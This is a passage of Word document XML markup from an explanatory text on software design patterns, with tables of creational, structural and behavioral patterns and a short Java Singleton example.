          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD04946" w14:textId="77777777" w:rsidR="00147AB8"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59C681">
          <v:rect id="_x0000_i2003" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97C783" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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1. Creational Patterns (object creation mechanis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4"/>
        <w:gridCol w:w="6278"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="3586A8C8" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CDD890" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF9DC56" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6104B033" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A05DCD2"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Singleton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF527CD"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Ensures only one instance of a class exists and provides global access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="76F09AAD" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE86E5F"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Factory Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDEDDD1"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Creates objects without specifying the exact class to be instantiated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="64C473CA" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076AD384"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Abstract Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28411B63"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rovides an interface for creating families of related objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="180C97D2" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9AE984"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Builder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FD64B0"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Constructs a complex object step-by-step.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="062673A9" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36290BA3"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Prototype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FB03678"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Creates new objects by cloning existing ones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C2FDA9D" w14:textId="77777777" w:rsidR="00147AB8"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A20FF7C">
          <v:rect id="_x0000_i2004" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E25FB3" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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2. Structural Patterns (compose objects and classes into larger structur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4"/>
        <w:gridCol w:w="7196"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="495F1F7C" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617E2560" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F6CBB6D" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="194CB6A1" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6147BE8C"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Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1865ED49"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Converts one interface into another expected by the client.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6A2A8358" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F06FF4D"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Bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A7D0B62"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Decouples abstraction from its implementation so they can vary independently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="0477E019" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BFDB183"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Composite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E8FFA08"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Composes objects into tree structures to represent part-whole hierarchies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="595470FB" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05DCD4BC"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Decorator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03D9E5E0"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Adds responsibilities to objects dynamically.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="15337BAE" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177F2647"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Facade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03EC2426"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rovides a simplified interface to a complex subsystem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="36D0E092" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="731C8CB0"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Flyweight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="294E2AE8"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Reduces memory usage by sharing common data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="58B0B56C" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06441629"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Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D12E38E"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rovides a surrogate or placeholder for another object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E2CCD60" w14:textId="77777777" w:rsidR="00147AB8"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F5E97F">
          <v:rect id="_x0000_i2005" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF86E2" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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3. Behavioral Patterns (how objects interact and communicat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57"/>
        <w:gridCol w:w="7237"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6FB7F171" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F766FFC" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DB2CEE5" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="51301666" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB67C79"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Observer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39D23B0C"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A subject notifies observers automatically of any state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="0E7B80D8" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD81521"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48AF772B"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Allows selecting an algorithm at runtime.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="03898CB4" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330A983D"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387F37B9"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Encapsulates a request as an object, allowing undo/redo operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="475CBE2F" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE7765C"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Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20B47E44"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rovides a way to access elements sequentially without exposing the structure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="7C7224A2" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF8F5DA"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Template Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FC91CD"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Defines the program skeleton, deferring some steps to subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="5EB52FB8" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F45FC6"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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="570B11C2"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Allows an object to alter its behavior when its internal state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="2F62AED0" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F4836D"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Chain of Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A62E7C8"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asses request along a chain until it is handled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="0465BF6B" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D91C27"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Mediator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F1A0604"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Defines an object that centralizes complex communications between objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="74D2EB93" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E6D17EE"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Memento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3BD7CF"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Captures and restores an object’s internal state without violating encapsulation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="035C5689" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA45C43"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Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E746BE6"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Implements a grammar for a language as a class hierarchy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="1AC38CC9" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0870828A"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Visitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F4CA785"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Allows adding new operations to existing object structures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFCAAF9" w14:textId="77777777" w:rsidR="00147AB8"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B0BA8D8">
          <v:rect id="_x0000_i2006" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37F5E3" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Example: Singleton Pattern (Creational)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0E0BA"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ublic class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A228D"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rivate static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC530A" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FA7BFA"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rivate Singleton() {} // private constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72FB64" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1922EF71"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4879CC"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33756658"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instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E412B7"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7DAEBAA9"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333BF0D6"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1D931CEF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0A7E4" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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Design patterns are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>language-independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enhance code </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
